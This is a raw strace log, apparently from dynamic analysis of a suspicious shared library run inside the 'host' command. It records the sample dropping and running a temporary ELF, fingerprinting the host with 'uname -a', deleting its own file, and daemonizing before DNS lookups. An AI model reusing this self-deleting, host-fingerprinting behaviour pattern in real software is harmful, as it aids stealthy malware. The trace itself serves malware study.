- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a6000
- mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a4000
- arch_prctl(ARCH_SET_FS, 0x7f57db0a4720) = 0
- mprotect(0x7f57d7573000, 4096, PROT_READ) = 0
- mprotect(0x7f57d7796000, 4096, PROT_READ) = 0
- [...]
- mprotect(0x7f57db2df000, 4096, PROT_READ) = 0
- mprotect(0x7f57db0c1000, 4096, PROT_READ) = 0
- munmap(0x7f57db0b1000, 56122) = 0
- set_tid_address(0x7f57db0a49f0) = 18141
- set_robust_list(0x7f57db0a4a00, 0x18) = 0
- futex(0x7fff5d64a5ac, FUTEX_WAIT_BITSET_PRIVATE|FUTEX_CLOCK_REALTIME, 1, NULL, 7f57db0a4720) = -1 EAGAIN (Resource temporarily unavailable)
- rt_sigaction(SIGRTMIN, {0x7f57d9407ad0, [], SA_RESTORER|SA_SIGINFO, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigaction(SIGRT_1, {0x7f57d9407b60, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
- getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0
- rt_sigaction(SIGINT, {0x7f57d9a58950, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigaction(SIGTERM, {0x7f57d9a58950, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigaction(SIGPIPE, {SIG_IGN, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigaction(SIGHUP, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
- rt_sigprocmask(SIG_BLOCK, [HUP INT TERM], NULL, 8) = 0
- socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
- close(3) = 0
- socket(PF_INET6, SOCK_STREAM, IPPROTO_IP) = 3
- getsockname(3, {sa_family=AF_INET6, sin6_port=htons(0), inet_pton(AF_INET6, "::", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, [28]) = 0
- close(3) = 0
- socket(PF_FILE, SOCK_STREAM, 0) = 3
- close(3) = 0
- futex(0x7f57d9c7f8ec, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- futex(0x7f57d9c7f744, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- brk(0) = 0x7f57dd0d4000
- brk(0x7f57dd0f5000) = 0x7f57dd0f5000
- mmap(NULL, 266240, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db063000
- mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d6af2000
- mprotect(0x7f57d6af2000, 4096, PROT_NONE) = 0
- clone(Process 18146 attached
- child_stack=0x7f57d72f1fd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d72f29d0, tls=0x7f57d72f2700, child_tidptr=0x7f57d72f29d0) = 18146
- [pid 18141] mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d62f1000
- [pid 18141] mprotect(0x7f57d62f1000, 4096, PROT_NONE) = 0
- [pid 18141] clone(Process 18147 attached
- child_stack=0x7f57d6af0fd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d6af19d0, tls=0x7f57d6af1700, child_tidptr=0x7f57d6af19d0) = 18147
- [pid 18141] brk(0x7f57dd11a000) = 0x7f57dd11a000
- [pid 18141] pipe([3, 5]) = 0
- [pid 18141] fcntl(3, F_GETFL) = 0 (flags O_RDONLY)
- [pid 18141] fcntl(3, F_SETFL, O_RDONLY|O_NONBLOCK) = 0
- [pid 18141] epoll_create(64) = 6
- [pid 18141] epoll_ctl(6, EPOLL_CTL_ADD, 3, {EPOLLIN, {u32=3, u64=3}}) = 0
- [pid 18141] mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d5af0000
- [pid 18141] mprotect(0x7f57d5af0000, 4096, PROT_NONE) = 0
- [pid 18141] clone(Process 18148 attached
- child_stack=0x7f57d62effd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d62f09d0, tls=0x7f57d62f0700, child_tidptr=0x7f57d62f09d0) = 18148
- [pid 18147] set_robust_list(0x7f57d6af19e0, 0x18) = 0
- [pid 18147] futex(0x7f57db06a07c, FUTEX_WAIT_PRIVATE, 1, NULL <unfinished ...>
- [pid 18146] set_robust_list(0x7f57d72f29e0, 0x18) = 0
- [pid 18146] futex(0x7f57db06808c, FUTEX_WAIT_PRIVATE, 1, NULL <unfinished ...>
- [pid 18148] set_robust_list(0x7f57d62f09e0, 0x18) = 0
- [pid 18148] epoll_wait(6, <unfinished ...>
- [pid 18141] open("/usr/share/locale/C/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] futex(0x7f57daa802c0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] open("/usr/share/locale/C/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] futex(0x7f57d9c7f6f0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] futex(0x7f57d9c7f820, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] futex(0x7f57daa802c4, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] brk(0x7f57dd13b000) = 0x7f57dd13b000
- [pid 18141] open("/usr/lib/ssl/openssl.cnf", O_RDONLY) = 7
- [pid 18141] fstat(7, {st_mode=S_IFREG|0644, st_size=10835, ...}) = 0
- [pid 18141] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18141] read(7, "#\n# OpenSSL example configuratio"..., 4096) = 4096
- [pid 18141] read(7, "Netscape crash on BMPStrings or "..., 4096) = 4096
- [pid 18141] read(7, " this to avoid interpreting an e"..., 4096) = 2643
- [pid 18141] read(7, "", 4096) = 0
- [pid 18141] close(7) = 0
- [pid 18141] munmap(0x7f57db0be000, 4096) = 0
- [pid 18141] futex(0x7f57d9a250ec, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] open("/usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so", O_RDONLY) = 7
- [pid 18141] read(7, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320[\0\0\0\0\0\0"..., 832) = 832
- [pid 18141] fstat(7, {st_mode=S_IFREG|0644, st_size=93208, ...}) = 0
- [pid 18141] mmap(NULL, 2188288, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 7, 0) = 0x7f57d58d9000
- [pid 18141] mprotect(0x7f57d58ed000, 2097152, PROT_NONE) = 0
- [pid 18141] mmap(0x7f57d5aed000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 7, 0x14000) = 0x7f57d5aed000
- [pid 18141] close(7) = 0
- [pid 18141] mprotect(0x7f57d5aed000, 4096, PROT_READ) = 0
- [pid 18141] open("/usr/share/locale/C/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
- [pid 18141] futex(0x7f57daa7f8cc, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] futex(0x7f57daa7f9d0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18141] write(2, "Usage: host [-aCdlriTwv] [-c cla"..., 924Usage: host [-aCdlriTwv] [-c class] [-N ndots] [-t type] [-W time]
- [-R number] [-m flag] hostname [server]
- [...]
- ) = 924
- [pid 18141] time(NULL) = 1407227107
- [pid 18141] getcwd("/home/mmd/0x02E/009", 4096) = 20
- [pid 18141] lstat("/home/mmd/0x02E/009/atom-aggregator-64.so", {st_mode=S_IFREG|0644, st_size=27272, ...}) = 0
- [pid 18141] getcwd("/home/mmd/0x02E/009", 4096) = 20
- [pid 18141] open("/home/mmd/0x02E/009/1.18141", O_WRONLY|O_CREAT|O_TRUNC, 0777) = 7
- [pid 18141] write(7, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0`\200\4\0104\0\0\0"..., 106) = 106
- [pid 18141] close(7) = 0
- [pid 18141] clone(Process 18150 attached
- child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18150
- [pid 18141] wait4(-1, Process 18141 suspended
- <unfinished ...>
- [pid 18150] execve("/home/mmd/0x02E/009/1.18141", ["/home/mmd/0x02E/009/1.18141"], [/* 20 vars */]) = 0
- [ Process PID=18150 runs in 32 bit mode. ]
- [pid 18150] _exit(99) = ?
- Process 18141 resumed
- Process 18150 detached
- [pid 18141] <... chroot resumed> ) = 18150
- [pid 18141] --- SIGCHLD (Child exited) @ 0 (0) ---
- [ Process PID=18141 runs in 64 bit mode. ]
- [pid 18141] unlink("/home/mmd/0x02E/009/1.18141") = 0
- [pid 18141] socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 7
- [pid 18141] connect(7, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
- [pid 18141] getsockname(7, {sa_family=AF_INET, sin_port=htons(55006), sin_addr=inet_addr("78.46.37.69")}, [16]) = 0
- [pid 18141] geteuid() = 1015
- [pid 18141] pipe2([9, 10], O_CLOEXEC) = 0
- [pid 18141] clone(Process 18151 attached
- child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18151
- [pid 18141] close(10) = 0
- [pid 18141] fcntl(9, F_SETFD, 0) = 0
- [pid 18141] fstat(9, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
- [pid 18141] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18141] read(9, <unfinished ...>
- [pid 18151] close(9) = 0
- [pid 18151] dup2(10, 1) = 1
- [pid 18151] close(10) = 0
- [pid 18151] execve("/bin/sh", ["sh", "-c", "/bin/uname -a"], [/* 19 vars */]) = 0
- [pid 18151] brk(0) = 0xf3a000
- [pid 18151] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18151] mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a86000
- [pid 18151] access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
- [pid 18151] open("/etc/ld.so.cache", O_RDONLY) = 9
- [pid 18151] fstat(9, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- [pid 18151] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 9, 0) = 0x7f9096a78000
- [pid 18151] close(9) = 0
- [pid 18151] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18151] open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 9
- [pid 18151] read(9, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
- [pid 18151] fstat(9, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
- [pid 18151] mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 9, 0) = 0x7f90964de000
- [pid 18151] mprotect(0x7f9096660000, 2093056, PROT_NONE) = 0
- [pid 18151] mmap(0x7f909685f000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 9, 0x181000) = 0x7f909685f000
- [pid 18151] mmap(0x7f9096864000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f9096864000
- [pid 18151] close(9) = 0
- [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a77000
- [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a76000
- [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a75000
- [pid 18151] arch_prctl(ARCH_SET_FS, 0x7f9096a76700) = 0
- [pid 18151] mprotect(0x7f909685f000, 16384, PROT_READ) = 0
- [pid 18151] mprotect(0x7f9096a88000, 4096, PROT_READ) = 0
- [pid 18151] munmap(0x7f9096a78000, 56122) = 0
- [pid 18151] getpid() = 18151
- [pid 18151] rt_sigaction(SIGCHLD, {0x40f270, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
- [pid 18151] geteuid() = 1015
- [pid 18151] brk(0) = 0xf3a000
- [pid 18151] brk(0xf5b000) = 0xf5b000
- [pid 18151] getppid() = 18141
- [pid 18151] stat("/home/mmd/0x02E/009", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
- [pid 18151] stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
- [pid 18151] rt_sigaction(SIGINT, NULL, {SIG_DFL, [], 0}, 8) = 0
- [pid 18151] rt_sigaction(SIGINT, {0x40f270, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
- [pid 18151] rt_sigaction(SIGQUIT, NULL, {SIG_DFL, [], 0}, 8) = 0
- [pid 18151] rt_sigaction(SIGQUIT, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
- [pid 18151] rt_sigaction(SIGTERM, NULL, {SIG_DFL, [], 0}, 8) = 0
- [pid 18151] rt_sigaction(SIGTERM, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
- [pid 18151] clone(Process 18152 attached
- child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f9096a769d0) = 18152
- [pid 18151] wait4(-1, <unfinished ...>
- [pid 18152] execve("/bin/uname", ["/bin/uname", "-a"], [/* 19 vars */]) = 0
- [pid 18152] brk(0) = 0xef7000
- [pid 18152] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18152] mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac571000
- [pid 18152] access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
- [pid 18152] open("/etc/ld.so.cache", O_RDONLY) = 9
- [pid 18152] fstat(9, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- [pid 18152] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 9, 0) = 0x7ffeac563000
- [pid 18152] close(9) = 0
- [pid 18152] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18152] open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 9
- [pid 18152] read(9, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
- [pid 18152] fstat(9, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
- [pid 18152] mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 9, 0) = 0x7ffeabfc9000
- [pid 18152] mprotect(0x7ffeac14b000, 2093056, PROT_NONE) = 0
- [pid 18152] mmap(0x7ffeac34a000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 9, 0x181000) = 0x7ffeac34a000
- [pid 18152] mmap(0x7ffeac34f000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffeac34f000
- [pid 18152] close(9) = 0
- [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac562000
- [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac561000
- [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac560000
- [pid 18152] arch_prctl(ARCH_SET_FS, 0x7ffeac561700) = 0
- [pid 18152] mprotect(0x7ffeac34a000, 16384, PROT_READ) = 0
- [pid 18152] mprotect(0x606000, 4096, PROT_READ) = 0
- [pid 18152] mprotect(0x7ffeac573000, 4096, PROT_READ) = 0
- [pid 18152] munmap(0x7ffeac563000, 56122) = 0
- [pid 18152] brk(0) = 0xef7000
- [pid 18152] brk(0xf18000) = 0xf18000
- [pid 18152] uname({sys="Linux", node="1x111", ...}) = 0
- [pid 18152] fstat(1, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
- [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac570000
- [pid 18152] write(1, "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 73) = 73
- [pid 18141] <... read resumed> "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 4096) = 73
- [pid 18141] close(9) = 0
- [pid 18141] wait4(18151, Process 18141 suspended
- <unfinished ...>
- [pid 18152] close(1) = 0
- [pid 18152] munmap(0x7ffeac570000, 4096) = 0
- [pid 18152] close(2) = 0
- [pid 18152] exit_group(0) = ?
- Process 18152 detached
- [pid 18151] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 18152
- [pid 18151] --- SIGCHLD (Child exited) @ 0 (0) ---
- [pid 18151] rt_sigreturn(0x11) = 18152
- [pid 18151] exit_group(0) = ?
- Process 18141 resumed
- Process 18151 detached
- [pid 18141] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 18151
- [pid 18141] --- SIGCHLD (Child exited) @ 0 (0) ---
- [pid 18141] munmap(0x7f57db0be000, 4096) = 0
- [pid 18141] unlink("/home/mmd/0x02E/009/atom-aggregator-64.so") = 0
- [pid 18141] open(".cache", O_RDWR) = -1 ENOENT (No such file or directory)
- [pid 18141] unlink(".cache") = -1 ENOENT (No such file or directory)
- [pid 18141] open(".cache", O_RDWR|O_CREAT|O_TRUNC, 0666) = 9
- [pid 18141] ftruncate(9, 12582912) = 0
- [pid 18141] mmap(NULL, 12582912, PROT_READ|PROT_WRITE, MAP_SHARED, 9, 0) = 0x7f57d4cd9000
- [pid 18141] rt_sigaction(SIGPIPE, {SIG_IGN, [PIPE], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_IGN, ~[KILL STOP RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, 8) = 0
- [pid 18141] rt_sigaction(SIGCHLD, {SIG_IGN, [CHLD], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
- [pid 18141] rt_sigaction(SIGTSTP, {0x7f57dac9a0b4, [TSTP], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
- [pid 18141] rt_sigaction(SIGINT, {0x7f57dac9a0b4, [INT], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {0x7f57d9a58950, ~[KILL STOP RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, 8) = 0
- [pid 18141] rt_sigaction(SIGTTOU, {SIG_IGN, [TTOU], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
- [pid 18141] rt_sigaction(SIGTTIN, {SIG_IGN, [TTIN], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
- [pid 18141] clone(Process 18153 attached
- child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18153
- [pid 18141] exit_group(0) = ?
- Process 18141 attached (waiting for parent)
- [pid 18153] umask(0) = 022
- [pid 18153] setsid() = 18153
- [pid 18153] chroot("/") = -1 EPERM (Operation not permitted)
- [pid 18153] close(0) = 0
- [pid 18153] close(1) = 0
- [pid 18153] close(2) = 0
- [pid 18153] close(3) = 0
- [pid 18153] close(4) = 0
- [pid 18153] close(5) = 0
- [pid 18153] close(6) = 0
- [pid 18153] close(7) = 0
- [pid 18153] close(8) = 0
- [pid 18153] close(9) = 0
- [pid 18153] close(10) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(11) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(12) = -1 EBADF (Bad file descriptor)
- [...]
- [pid 18153] close(1019) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(1020) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(1021) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(1022) = -1 EBADF (Bad file descriptor)
- [pid 18153] close(1023) = -1 EBADF (Bad file descriptor)
- [pid 18153] open("/dev/null", O_RDONLY) = 0
- [pid 18153] open("/dev/null", O_RDONLY) = 1
- [pid 18153] open("/dev/null", O_RDONLY) = 2
- [pid 18153] open("/dev/null", O_RDONLY) = 3
- [pid 18153] time(NULL) = 1407227107
- [pid 18153] socket(PF_NETLINK, SOCK_RAW, 0) = 4
- [pid 18153] bind(4, {sa_family=AF_NETLINK, pid=0, groups=00000000}, 12) = 0
- [pid 18153] getsockname(4, {sa_family=AF_NETLINK, pid=18153, groups=00000000}, [12]) = 0
- [pid 18153] time(NULL) = 1407227107
- [pid 18153] sendto(4, "\24\0\0\0\26\0\1\3\343\224\340S\0\0\0\0\0\0\0\0", 20, 0, {sa_family=AF_NETLINK, pid=0, groups=00000000}, 12) = 20
- [pid 18153] recvmsg(4, {msg_name(12)={sa_family=AF_NETLINK, pid=0, groups=00000000}, msg_iov(1)=[{"0\0\0\0\24\0\2\0\343\224\340S\351F\0\0\2\10\200\376\1\0\0\0\10\0\1\0\177\0\0\1"..., 4096}], msg_controllen=0, msg_flags=0}, 0) = 108
- [pid 18153] recvmsg(4, {msg_name(12)={sa_family=AF_NETLINK, pid=0, groups=00000000}, msg_iov(1)=[{"\24\0\0\0\3\0\2\0\343\224\340S\351F\0\0\0\0\0\0\1\0\0\0\10\0\1\0\177\0\0\1"..., 4096}], msg_controllen=0, msg_flags=0}, 0) = 20
- [pid 18153] close(4) = 0
- [pid 18153] open("/etc/resolv.conf", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
- [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 629
- [pid 18153] read(4, "", 4096) = 0
- [pid 18153] close(4) = 0
- [pid 18153] munmap(0x7f57db0be000, 4096) = 0
- [pid 18153] uname({sys="Linux", node="1x111", ...}) = 0
- [pid 18153] socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 4
- [pid 18153] connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
- [pid 18153] close(4) = 0
- [pid 18153] socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 4
- [pid 18153] connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
- [pid 18153] close(4) = 0
- [pid 18153] open("/etc/nsswitch.conf", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
- [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18153] read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 475
- [pid 18153] read(4, "", 4096) = 0
- [pid 18153] close(4) = 0
- [pid 18153] munmap(0x7f57db0be000, 4096) = 0
- [pid 18153] open("/etc/ld.so.cache", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- [pid 18153] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f57db0b1000
- [pid 18153] close(4) = 0
- [pid 18153] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18153] open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
- [pid 18153] read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200!\0\0\0\0\0\0"..., 832) = 832
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=47616, ...}) = 0
- [pid 18153] mmap(NULL, 2143624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f57d4acd000
- [pid 18153] mprotect(0x7f57d4ad8000, 2093056, PROT_NONE) = 0
- [pid 18153] mmap(0x7f57d4cd7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0xa000) = 0x7f57d4cd7000
- [pid 18153] close(4) = 0
- [pid 18153] mprotect(0x7f57d4cd7000, 4096, PROT_READ) = 0
- [pid 18153] munmap(0x7f57db0b1000, 56122) = 0
- [pid 18153] open("/etc/host.conf", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=9, ...}) = 0
- [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18153] read(4, "multi on\n", 4096) = 9
- [pid 18153] read(4, "", 4096) = 0
- [pid 18153] close(4) = 0
- [pid 18153] munmap(0x7f57db0be000, 4096) = 0
- [pid 18153] futex(0x7f57d90a0324, FUTEX_WAKE_PRIVATE, 2147483647) = 0
- [pid 18153] open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=495, ...}) = 0
- [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 495
- [pid 18153] read(4, "", 4096) = 0
- [pid 18153] close(4) = 0
- [pid 18153] munmap(0x7f57db0be000, 4096) = 0
- [pid 18153] open("/etc/ld.so.cache", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- [pid 18153] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f57db0b1000
- [pid 18153] close(4) = 0
- [pid 18153] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- [pid 18153] open("/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY) = 4
